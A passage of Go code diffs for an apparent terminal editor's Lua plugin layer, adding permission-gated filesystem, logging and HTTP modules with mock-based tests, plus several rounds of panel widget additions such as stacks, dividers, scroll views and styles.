+	if p.State.GetGlobal("found").String() != "true" {
+		t.Error("expected found=true")
+	}
+	if p.State.GetGlobal("missing").String() != "false" {
+		t.Error("expected missing=false")
+	}
+}
+
+func TestFsList(t *testing.T) {
+	mock := &mockFilesystemAPI{
+		dirs: map[string][]FileEntry{
+			"/tmp": {
+				{Name: "file.txt", IsDir: false},
+				{Name: "subdir", IsDir: true},
+			},
+		},
+	}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		local entries = fs.list("/tmp")
+		_G.count = #entries
+		_G.first_name = entries[1].name
+		_G.first_dir = entries[1].is_dir
+		_G.second_name = entries[2].name
+		_G.second_dir = entries[2].is_dir
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("count").String() != "2" {
+		t.Errorf("expected 2 entries, got %s", p.State.GetGlobal("count").String())
+	}
+	if p.State.GetGlobal("first_name").String() != "file.txt" {
+		t.Errorf("expected 'file.txt', got %q", p.State.GetGlobal("first_name").String())
+	}
+	if p.State.GetGlobal("second_dir").String() != "true" {
+		t.Error("expected second entry to be a directory")
+	}
+}
+
+func TestFsReadWithoutPermission(t *testing.T) {
+	mock := &mockFilesystemAPI{files: map[string]string{"/tmp/test": "data"}}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		fs.read("/tmp/test")
+	`)
+	if err == nil {
+		t.Fatal("expected error when fs.read not granted")
+	}
+}
+
+func TestFsWriteWithoutPermission(t *testing.T) {
+	mock := &mockFilesystemAPI{}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		fs.write("/tmp/test", "data")
+	`)
+	if err == nil {
+		t.Fatal("expected error when fs.write not granted")
+	}
+}

--- a/internal/plugin/lua_log_test.go
+++ b/internal/plugin/lua_log_test.go
@@ -1,0 +1,119 @@
+package plugin
+
+import (
+	"fmt"
+	"testing"
+)
+
+func TestLogInfo(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	var logged []struct{ level, message string }
+	p.Log = func(level, message string) {
+		logged = append(logged, struct{ level, message string }{level, message})
+	}
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.log("hello world")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(logged) != 1 {
+		t.Fatalf("expected 1 log entry, got %d", len(logged))
+	}
+	if logged[0].level != "info" {
+		t.Errorf("expected level 'info', got %q", logged[0].level)
+	}
+	if logged[0].message != "hello world" {
+		t.Errorf("expected message 'hello world', got %q", logged[0].message)
+	}
+}
+
+func TestLogWithLevel(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	var logged []struct{ level, message string }
+	p.Log = func(level, message string) {
+		logged = append(logged, struct{ level, message string }{level, message})
+	}
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.log("warn", "something is off")
+		ttt.log("error", "something broke")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(logged) != 2 {
+		t.Fatalf("expected 2 log entries, got %d", len(logged))
+	}
+	if logged[0].level != "warn" || logged[0].message != "something is off" {
+		t.Errorf("unexpected entry 0: %+v", logged[0])
+	}
+	if logged[1].level != "error" || logged[1].message != "something broke" {
+		t.Errorf("unexpected entry 1: %+v", logged[1])
+	}
+}
+
+func TestLogWithoutCallback(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.log("no callback set")
+	`)
+	if err != nil {
+		t.Fatalf("should not error when Log callback is nil: %v", err)
+	}
+}
+
+func TestLogNoPermissionNeeded(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	var called bool
+	p.Log = func(level, message string) {
+		called = true
+	}
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.log("works without any permissions")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if !called {
+		t.Error("expected Log callback to be called")
+	}
+}
+
+func TestLogErrorRouting(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	var logged []struct{ level, message string }
+	p.Log = func(level, message string) {
+		logged = append(logged, struct{ level, message string }{level, message})
+	}
+
+	p.logError("test context", fmt.Errorf("test error"))
+
+	if len(logged) != 1 {
+		t.Fatalf("expected 1 log entry, got %d", len(logged))
+	}
+	if logged[0].level != "error" {
+		t.Errorf("expected level 'error', got %q", logged[0].level)
+	}
+	if logged[0].message != "test context: test error" {
+		t.Errorf("expected 'test context: test error', got %q", logged[0].message)
+	}
+}

--- a/internal/plugin/lua_net.go
+++ b/internal/plugin/lua_net.go
@@ -1,0 +1,164 @@
+package plugin
+
+import (
+	"log/slog"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+func setupNetModule(L *lua.LState, p *Plugin) {
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		if p.Granted.Check("network.http") == nil {
+			L.SetField(mod, "get", L.NewFunction(netGet(p)))
+			L.SetField(mod, "post", L.NewFunction(netPost(p)))
+			L.SetField(mod, "get_async", L.NewFunction(netGetAsync(p)))
+			L.SetField(mod, "post_async", L.NewFunction(netPostAsync(p)))
+		}
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt.net", loader)
+}
+
+func extractHeaders(L *lua.LState, tbl *lua.LTable) map[string]string {
+	headers := make(map[string]string)
+	if tbl == nil {
+		return headers
+	}
+	if h, ok := L.GetField(tbl, "headers").(*lua.LTable); ok {
+		h.ForEach(func(k, v lua.LValue) {
+			headers[k.String()] = v.String()
+		})
+	}
+	return headers
+}
+
+func httpResultToLua(L *lua.LState, status int, body string, headers map[string]string, err error) *lua.LTable {
+	tbl := L.NewTable()
+	if err != nil {
+		L.SetField(tbl, "status", lua.LNumber(0))
+		L.SetField(tbl, "body", lua.LString(""))
+		L.SetField(tbl, "error", lua.LString(err.Error()))
+	} else {
+		L.SetField(tbl, "status", lua.LNumber(status))
+		L.SetField(tbl, "body", lua.LString(body))
+		if headers != nil {
+			ht := L.NewTable()
+			for k, v := range headers {
+				L.SetField(ht, k, lua.LString(v))
+			}
+			L.SetField(tbl, "headers", ht)
+		}
+	}
+	return tbl
+}
+
+func netGet(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Network == nil {
+			L.ArgError(1, "network API not available")
+			return 0
+		}
+		url := L.CheckString(1)
+		var headers map[string]string
+		if opts, ok := L.Get(2).(*lua.LTable); ok {
+			headers = extractHeaders(L, opts)
+		}
+		status, body, respHeaders, err := p.Network.Get(url, headers)
+		L.Push(httpResultToLua(L, status, body, respHeaders, err))
+		return 1
+	}
+}
+
+func netPost(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Network == nil {
+			L.ArgError(1, "network API not available")
+			return 0
+		}
+		url := L.CheckString(1)
+		opts, _ := L.Get(2).(*lua.LTable)
+		var headers map[string]string
+		var body string
+		if opts != nil {
+			headers = extractHeaders(L, opts)
+			if b := L.GetField(opts, "body"); b != lua.LNil {
+				body = b.String()
+			}
+		}
+		status, respBody, respHeaders, err := p.Network.Post(url, headers, body)
+		L.Push(httpResultToLua(L, status, respBody, respHeaders, err))
+		return 1
+	}
+}
+
+func netGetAsync(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Network == nil {
+			L.ArgError(1, "network API not available")
+			return 0
+		}
+		url := L.CheckString(1)
+		var headers map[string]string
+		callbackIdx := 2
+		if opts, ok := L.Get(2).(*lua.LTable); ok {
+			headers = extractHeaders(L, opts)
+			callbackIdx = 3
+		}
+		callback := L.CheckFunction(callbackIdx)
+
+		go func() {
+			status, body, respHeaders, err := p.Network.Get(url, headers)
+			resultFn := func() {
+				tbl := httpResultToLua(p.State, status, body, respHeaders, err)
+				if callErr := p.CallLuaFunc(callback, tbl); callErr != nil {
+					slog.Error("plugin async net callback error", "plugin", p.Name, "error", callErr)
+				}
+			}
+			if p.PostAsync != nil {
+				p.PostAsync(&PluginAsyncResult{Plugin: p, Callback: resultFn})
+			}
+		}()
+
+		return 0
+	}
+}
+
+func netPostAsync(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Network == nil {
+			L.ArgError(1, "network API not available")
+			return 0
+		}
+		url := L.CheckString(1)
+		opts, _ := L.Get(2).(*lua.LTable)
+		var headers map[string]string
+		var body string
+		if opts != nil {
+			headers = extractHeaders(L, opts)
+			if b := L.GetField(opts, "body"); b != lua.LNil {
+				body = b.String()
+			}
+		}
+		callback := L.CheckFunction(3)
+
+		go func() {
+			status, respBody, respHeaders, err := p.Network.Post(url, headers, body)
+			resultFn := func() {
+				tbl := httpResultToLua(p.State, status, respBody, respHeaders, err)
+				if callErr := p.CallLuaFunc(callback, tbl); callErr != nil {
+					slog.Error("plugin async net callback error", "plugin", p.Name, "error", callErr)
+				}
+			}
+			if p.PostAsync != nil {
+				p.PostAsync(&PluginAsyncResult{Plugin: p, Callback: resultFn})
+			}
+		}()
+
+		return 0
+	}
+}

--- a/internal/plugin/lua_net_test.go
+++ b/internal/plugin/lua_net_test.go
@@ -1,0 +1,153 @@
+package plugin
+
+import (
+	"fmt"
+	"testing"
+)
+
+type mockNetworkAPI struct {
+	getStatus  int
+	getBody    string
+	getHeaders map[string]string
+	getErr     error
+
+	postStatus  int
+	postBody    string
+	postHeaders map[string]string
+	postErr     error
+
+	lastURL     string
+	lastHeaders map[string]string
+	lastBody    string
+}
+
+func (m *mockNetworkAPI) Get(url string, headers map[string]string) (int, string, map[string]string, error) {
+	m.lastURL = url
+	m.lastHeaders = headers
+	return m.getStatus, m.getBody, m.getHeaders, m.getErr
+}
+
+func (m *mockNetworkAPI) Post(url string, headers map[string]string, body string) (int, string, map[string]string, error) {
+	m.lastURL = url
+	m.lastHeaders = headers
+	m.lastBody = body
+	return m.postStatus, m.postBody, m.postHeaders, m.postErr
+}
+
+func setupTestPluginWithNet(perms PermissionSet, net *mockNetworkAPI) (*Plugin, func()) {
+	p, cleanup := newTestPluginBase(perms)
+	p.Network = net
+	return p, cleanup
+}
+
+func TestNetGet(t *testing.T) {
+	mock := &mockNetworkAPI{
+		getStatus:  200,
+		getBody:    `{"ok": true}`,
+		getHeaders: map[string]string{"Content-Type": "application/json"},
+	}
+	p, cleanup := setupTestPluginWithNet(PermissionSet{NetworkHTTP: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local net = require("ttt.net")
+		local resp = net.get("https://api.example.com/data")
+		_G.status = resp.status
+		_G.body = resp.body
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("status").String() != "200" {
+		t.Errorf("expected status 200, got %s", p.State.GetGlobal("status").String())
+	}
+	if p.State.GetGlobal("body").String() != `{"ok": true}` {
+		t.Errorf("unexpected body: %q", p.State.GetGlobal("body").String())
+	}
+	if mock.lastURL != "https://api.example.com/data" {
+		t.Errorf("unexpected URL: %q", mock.lastURL)
+	}
+}
+
+func TestNetGetWithHeaders(t *testing.T) {
+	mock := &mockNetworkAPI{getStatus: 200, getBody: "ok"}
+	p, cleanup := setupTestPluginWithNet(PermissionSet{NetworkHTTP: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local net = require("ttt.net")
+		net.get("https://api.example.com", {
+			headers = { ["Authorization"] = "Bearer token123" },
+		})
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if mock.lastHeaders["Authorization"] != "Bearer token123" {
+		t.Errorf("expected auth header, got %v", mock.lastHeaders)
+	}
+}
+
+func TestNetPost(t *testing.T) {
+	mock := &mockNetworkAPI{
+		postStatus: 201,
+		postBody:   `{"id": 1}`,
+	}
+	p, cleanup := setupTestPluginWithNet(PermissionSet{NetworkHTTP: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local net = require("ttt.net")
+		local resp = net.post("https://api.example.com/create", {
+			headers = { ["Content-Type"] = "application/json" },
+			body = '{"name": "test"}',
+		})
+		_G.status = resp.status
+		_G.body = resp.body
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("status").String() != "201" {
+		t.Errorf("expected status 201, got %s", p.State.GetGlobal("status").String())
+	}
+	if mock.lastBody != `{"name": "test"}` {
+		t.Errorf("unexpected request body: %q", mock.lastBody)
+	}
+}
+
+func TestNetGetError(t *testing.T) {
+	mock := &mockNetworkAPI{getErr: fmt.Errorf("connection refused")}
+	p, cleanup := setupTestPluginWithNet(PermissionSet{NetworkHTTP: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local net = require("ttt.net")
+		local resp = net.get("https://unreachable.example.com")
+		_G.has_error = (resp.error ~= nil)
+		_G.status = resp.status
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("has_error").String() != "true" {
+		t.Error("expected error field in response")
+	}
+	if p.State.GetGlobal("status").String() != "0" {
+		t.Errorf("expected status 0 on error, got %s", p.State.GetGlobal("status").String())
+	}
+}
+
+func TestNetWithoutPermission(t *testing.T) {
+	mock := &mockNetworkAPI{}
+	p, cleanup := setupTestPluginWithNet(PermissionSet{}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local net = require("ttt.net")
+		net.get("https://api.example.com")
+	`)
+	if err == nil {
+		t.Fatal("expected error when network.http not granted")
+	}
+}

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -463,6 +463,18 @@ func panelBoxWidget(L *lua.LState) int {
 	if v := L.GetField(tbl, "border"); v != lua.LNil {
 		desc.Border = lua.LVAsBool(v)
 	}
+	if v := L.GetField(tbl, "border_top"); v != lua.LNil {
+		desc.BorderTop = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "border_bottom"); v != lua.LNil {
+		desc.BorderBottom = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "border_left"); v != lua.LNil {
+		desc.BorderLeft = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "border_right"); v != lua.LNil {
+		desc.BorderRight = lua.LVAsBool(v)
+	}
 	if v := L.GetField(tbl, "height"); v != lua.LNil {
 		desc.FixedHeight = int(lua.LVAsNumber(v))
 	}

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -11,16 +11,29 @@ import (
 const panelTypeName = "panel"
 
 var styleMap = map[string]term.Style{
-	"default":  term.StyleDefault,
-	"muted":    term.StyleMuted,
-	"border":   term.StyleBorder,
-	"success":  term.StyleSuccess,
-	"danger":   term.StyleDanger,
-	"warning":  term.StyleWarning,
-	"selected": term.StyleSidebarSelected,
-	"item":     term.StylePaletteItem,
-	"line":     term.StyleLineNumber,
-	"input":    term.StyleInput,
+	"default":          term.StyleDefault,
+	"muted":            term.StyleMuted,
+	"border":           term.StyleBorder,
+	"success":          term.StyleSuccess,
+	"danger":           term.StyleDanger,
+	"warning":          term.StyleWarning,
+	"selected":         term.StyleSidebarSelected,
+	"item":             term.StylePaletteItem,
+	"line":             term.StyleLineNumber,
+	"input":            term.StyleInput,
+	"bold":             term.StyleHoverBold,
+	"code":             term.StyleHoverCode,
+	"syntax_comment":   term.StyleSyntaxComment,
+	"syntax_string":    term.StyleSyntaxString,
+	"syntax_keyword":   term.StyleSyntaxKeyword,
+	"syntax_number":    term.StyleSyntaxNumber,
+	"syntax_operator":  term.StyleSyntaxOperator,
+	"syntax_function":  term.StyleSyntaxFunction,
+	"syntax_type":      term.StyleSyntaxType,
+	"syntax_builtin":   term.StyleSyntaxBuiltin,
+	"syntax_variable":  term.StyleSyntaxVariable,
+	"syntax_tag":       term.StyleSyntaxTag,
+	"syntax_attribute": term.StyleSyntaxAttribute,
 }
 
 type PanelProxy struct {
@@ -69,8 +82,11 @@ func RegisterPanelType(L *lua.LState) {
 		"box":      panelBoxWidget,
 		"dropdown": panelDropdownWidget,
 		"title":    panelTitleWidget,
-		"keyvalue": panelKeyValueWidget,
-		"redraw":   panelRedraw,
+		"keyvalue":   panelKeyValueWidget,
+		"scrollview": panelScrollViewWidget,
+		"hstack":    panelHStackWidget,
+		"divider":   panelDividerWidget,
+		"redraw":    panelRedraw,
 	}))
 }
 
@@ -206,6 +222,9 @@ func panelLabelWidget(L *lua.LState) int {
 		if b := L.GetField(v, "badge"); b != lua.LNil {
 			desc.Badge = b.String()
 		}
+		if w := L.GetField(v, "width"); w != lua.LNil {
+			desc.FixedWidth = int(lua.LVAsNumber(w))
+		}
 		parseBoxModel(L, v, &desc)
 	default:
 		desc.Text = arg.String()
@@ -296,6 +315,9 @@ func panelTreeWidget(L *lua.LState) int {
 	if menu, ok := L.GetField(tbl, "node_menu").(*lua.LTable); ok {
 		desc.NodeMenu = parseLuaMenuEntries(L, menu)
 	}
+	if kc, ok := L.GetField(tbl, "key_commands").(*lua.LTable); ok {
+		desc.KeyCommands = parseLuaKeyCommands(L, kc)
+	}
 
 	proxy.appendDesc(WidgetTree, desc)
 	return 0
@@ -321,6 +343,9 @@ func panelListWidget(L *lua.LState) int {
 	}
 	if menu, ok := L.GetField(tbl, "node_menu").(*lua.LTable); ok {
 		desc.NodeMenu = parseLuaMenuEntries(L, menu)
+	}
+	if kc, ok := L.GetField(tbl, "key_commands").(*lua.LTable); ok {
+		desc.KeyCommands = parseLuaKeyCommands(L, kc)
 	}
 
 	proxy.appendDesc(WidgetList, desc)
@@ -368,6 +393,9 @@ func panelInputWidget(L *lua.LState) int {
 	if fn, ok := L.GetField(tbl, "on_submit").(*lua.LFunction); ok {
 		desc.OnSubmit = fn
 	}
+	if v := L.GetField(tbl, "clear_on_submit"); v != lua.LNil {
+		desc.ClearOnSubmit = lua.LVAsBool(v)
+	}
 
 	proxy.appendDesc(WidgetInput, desc)
 	return 0
@@ -391,6 +419,18 @@ func parseBoxModel(L *lua.LState, tbl *lua.LTable, desc *WidgetDesc) {
 			*field.dst = int(lua.LVAsNumber(v))
 		}
 	}
+}
+
+func parseLuaKeyCommands(_ *lua.LState, tbl *lua.LTable) map[rune]string {
+	m := map[rune]string{}
+	tbl.ForEach(func(k, v lua.LValue) {
+		key := k.String()
+		cmd := v.String()
+		if len(key) == 1 && cmd != "" {
+			m[rune(key[0])] = cmd
+		}
+	})
+	return m
 }
 
 func parseLuaMenuEntries(L *lua.LState, tbl *lua.LTable) []widgets.MenuEntry {
@@ -448,6 +488,57 @@ func panelVStackWidget(L *lua.LState) int {
 	return 0
 }
 
+func panelHStackWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if fn, ok := L.GetField(tbl, "render").(*lua.LFunction); ok {
+		desc.Children = collectChildren(L, proxy, fn)
+	}
+	if v := L.GetField(tbl, "gap"); v != lua.LNil {
+		desc.Gap = int(lua.LVAsNumber(v))
+	}
+	if v := L.GetField(tbl, "height"); v != lua.LNil {
+		desc.FixedHeight = int(lua.LVAsNumber(v))
+	}
+
+	proxy.appendDesc(WidgetHStack, desc)
+	return 0
+}
+
+func panelDividerWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	desc := WidgetDesc{}
+	proxy.appendDesc(WidgetDivider, desc)
+	return 0
+}
+
+func panelScrollViewWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if fn, ok := L.GetField(tbl, "render").(*lua.LFunction); ok {
+		desc.Children = collectChildren(L, proxy, fn)
+	}
+
+	proxy.appendDesc(WidgetScrollView, desc)
+	return 0
+}
+
 func panelBoxWidget(L *lua.LState) int {
 	proxy := checkPanelProxy(L)
 	if proxy == nil {
@@ -478,6 +569,7 @@ func panelBoxWidget(L *lua.LState) int {
 	if v := L.GetField(tbl, "height"); v != lua.LNil {
 		desc.FixedHeight = int(lua.LVAsNumber(v))
 	}
+	parseBoxModel(L, tbl, &desc)
 
 	proxy.appendDesc(WidgetBox, desc)
 	return 0

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -1,0 +1,136 @@
+package plugin
+
+import (
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+const panelTypeName = "panel"
+
+var styleMap = map[string]term.Style{
+	"default":  term.StyleDefault,
+	"muted":    term.StyleMuted,
+	"border":   term.StyleBorder,
+	"success":  term.StyleSuccess,
+	"danger":   term.StyleDanger,
+	"warning":  term.StyleWarning,
+	"selected": term.StyleSidebarSelected,
+	"item":     term.StylePaletteItem,
+	"line":     term.StyleLineNumber,
+	"input":    term.StyleInput,
+}
+
+type PanelProxy struct {
+	surface widgets.Surface
+}
+
+func NewPanelProxy(surface widgets.Surface) *PanelProxy {
+	return &PanelProxy{surface: surface}
+}
+
+func RegisterPanelType(L *lua.LState) {
+	mt := L.NewTypeMetatable(panelTypeName)
+	L.SetField(mt, "__index", L.SetFuncs(L.NewTable(), map[string]lua.LGFunction{
+		"size":  panelSize,
+		"cell":  panelCell,
+		"text":  panelText,
+		"clear": panelClear,
+	}))
+}
+
+func PushPanelProxy(L *lua.LState, proxy *PanelProxy) *lua.LUserData {
+	ud := L.NewUserData()
+	ud.Value = proxy
+	L.SetMetatable(ud, L.GetTypeMetatable(panelTypeName))
+	return ud
+}
+
+func checkPanelProxy(L *lua.LState) *PanelProxy {
+	ud := L.CheckUserData(1)
+	if proxy, ok := ud.Value.(*PanelProxy); ok {
+		return proxy
+	}
+	L.ArgError(1, "panel expected")
+	return nil
+}
+
+func resolveStyle(L *lua.LState, argPos int) term.Style {
+	v := L.Get(argPos)
+	if v == nil || v == lua.LNil {
+		return term.StyleDefault
+	}
+
+	if tbl, ok := v.(*lua.LTable); ok {
+		if s := L.GetField(tbl, "style"); s != lua.LNil {
+			if mapped, ok := styleMap[s.String()]; ok {
+				return mapped
+			}
+		}
+	}
+
+	if str, ok := v.(lua.LString); ok {
+		if mapped, ok := styleMap[string(str)]; ok {
+			return mapped
+		}
+	}
+
+	return term.StyleDefault
+}
+
+func panelSize(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+	w, h := proxy.surface.Size()
+	L.Push(lua.LNumber(w))
+	L.Push(lua.LNumber(h))
+	return 2
+}
+
+func panelCell(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+	x := int(L.CheckNumber(2))
+	y := int(L.CheckNumber(3))
+	ch := L.CheckString(4)
+	style := resolveStyle(L, 5)
+
+	runes := []rune(ch)
+	if len(runes) > 0 {
+		proxy.surface.SetCell(x, y, term.Cell{Ch: runes[0], Style: style})
+	}
+	return 0
+}
+
+func panelText(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+	x := int(L.CheckNumber(2))
+	y := int(L.CheckNumber(3))
+	text := L.CheckString(4)
+	style := resolveStyle(L, 5)
+
+	w, _ := proxy.surface.Size()
+	proxy.surface.DrawText(x, y, text, w-x, style)
+	return 0
+}
+
+func panelClear(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+	x := int(L.CheckNumber(2))
+	y := int(L.CheckNumber(3))
+	w := int(L.CheckNumber(4))
+	h := int(L.CheckNumber(5))
+
+	proxy.surface.ClearRect(x, y, w, h, term.StyleDefault)
+	return 0
+}

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -56,16 +56,19 @@ func (pp *PanelProxy) appendDesc(kind WidgetKind, desc WidgetDesc) {
 func RegisterPanelType(L *lua.LState) {
 	mt := L.NewTypeMetatable(panelTypeName)
 	L.SetField(mt, "__index", L.SetFuncs(L.NewTable(), map[string]lua.LGFunction{
-		"size":   panelSize,
-		"cell":   panelCell,
-		"text":   panelText,
-		"clear":  panelClear,
-		"label":  panelLabelWidget,
-		"tree":   panelTreeWidget,
-		"list":   panelListWidget,
-		"button": panelButtonWidget,
-		"input":  panelInputWidget,
-		"redraw": panelRedraw,
+		"size":     panelSize,
+		"cell":     panelCell,
+		"text":     panelText,
+		"clear":    panelClear,
+		"label":    panelLabelWidget,
+		"tree":     panelTreeWidget,
+		"list":     panelListWidget,
+		"button":   panelButtonWidget,
+		"input":    panelInputWidget,
+		"vstack":   panelVStackWidget,
+		"box":      panelBoxWidget,
+		"dropdown": panelDropdownWidget,
+		"redraw":   panelRedraw,
 	}))
 }
 
@@ -227,6 +230,12 @@ func panelTreeWidget(L *lua.LState) int {
 	if fn, ok := L.GetField(tbl, "on_expand").(*lua.LFunction); ok {
 		desc.OnExpand = fn
 	}
+	if fn, ok := L.GetField(tbl, "on_command").(*lua.LFunction); ok {
+		desc.OnCommand = fn
+	}
+	if menu, ok := L.GetField(tbl, "node_menu").(*lua.LTable); ok {
+		desc.NodeMenu = parseLuaMenuEntries(L, menu)
+	}
 
 	proxy.appendDesc(WidgetTree, desc)
 	return 0
@@ -246,6 +255,12 @@ func panelListWidget(L *lua.LState) int {
 	}
 	if fn, ok := L.GetField(tbl, "on_select").(*lua.LFunction); ok {
 		desc.OnSelect = fn
+	}
+	if fn, ok := L.GetField(tbl, "on_command").(*lua.LFunction); ok {
+		desc.OnCommand = fn
+	}
+	if menu, ok := L.GetField(tbl, "node_menu").(*lua.LTable); ok {
+		desc.NodeMenu = parseLuaMenuEntries(L, menu)
 	}
 
 	proxy.appendDesc(WidgetList, desc)
@@ -295,6 +310,109 @@ func panelInputWidget(L *lua.LState) int {
 	}
 
 	proxy.appendDesc(WidgetInput, desc)
+	return 0
+}
+
+func parseLuaMenuEntries(L *lua.LState, tbl *lua.LTable) []widgets.MenuEntry {
+	var entries []widgets.MenuEntry
+	tbl.ForEach(func(_, v lua.LValue) {
+		entry, ok := v.(*lua.LTable)
+		if !ok {
+			return
+		}
+		me := widgets.MenuEntry{}
+		if label := L.GetField(entry, "label"); label != lua.LNil {
+			me.Label = label.String()
+		}
+		if cmd := L.GetField(entry, "command"); cmd != lua.LNil {
+			me.Command = cmd.String()
+		}
+		if sep := L.GetField(entry, "separator"); sep != lua.LNil {
+			me.Separator = lua.LVAsBool(sep)
+		}
+		entries = append(entries, me)
+	})
+	return entries
+}
+
+func collectChildren(L *lua.LState, proxy *PanelProxy, fn *lua.LFunction) []WidgetDesc {
+	child := &PanelProxy{
+		surface:    proxy.surface,
+		plugin:     proxy.plugin,
+		descCounts: make(map[WidgetKind]int),
+	}
+	ud := PushPanelProxy(L, child)
+	if err := L.CallByParam(lua.P{Fn: fn, NRet: 0, Protect: true}, ud); err != nil {
+		proxy.plugin.logError("widget builder", err)
+	}
+	return child.descs
+}
+
+func panelVStackWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if fn, ok := L.GetField(tbl, "render").(*lua.LFunction); ok {
+		desc.Children = collectChildren(L, proxy, fn)
+	}
+	if v := L.GetField(tbl, "gap"); v != lua.LNil {
+		desc.Gap = int(lua.LVAsNumber(v))
+	}
+
+	proxy.appendDesc(WidgetVStack, desc)
+	return 0
+}
+
+func panelBoxWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if fn, ok := L.GetField(tbl, "render").(*lua.LFunction); ok {
+		desc.Children = collectChildren(L, proxy, fn)
+	}
+	if v := L.GetField(tbl, "border"); v != lua.LNil {
+		desc.Border = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "height"); v != lua.LNil {
+		desc.FixedHeight = int(lua.LVAsNumber(v))
+	}
+
+	proxy.appendDesc(WidgetBox, desc)
+	return 0
+}
+
+func panelDropdownWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if v := L.GetField(tbl, "label"); v != lua.LNil {
+		desc.Label = v.String()
+	}
+
+	if entries, ok := L.GetField(tbl, "entries").(*lua.LTable); ok {
+		desc.Entries = parseLuaMenuEntries(L, entries)
+	}
+
+	if fn, ok := L.GetField(tbl, "on_menu").(*lua.LFunction); ok {
+		desc.OnMenu = fn
+	}
+
+	proxy.appendDesc(WidgetDropdown, desc)
 	return 0
 }
 

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -1,6 +1,8 @@
 package plugin
 
 import (
+	"fmt"
+
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/widgets"
 	lua "github.com/yuin/gopher-lua"
@@ -22,20 +24,48 @@ var styleMap = map[string]term.Style{
 }
 
 type PanelProxy struct {
-	surface widgets.Surface
+	surface     widgets.Surface
+	plugin      *Plugin
+	descs       []WidgetDesc
+	usedRaw     bool
+	usedWidgets bool
+	descCounts  map[WidgetKind]int
 }
 
-func NewPanelProxy(surface widgets.Surface) *PanelProxy {
-	return &PanelProxy{surface: surface}
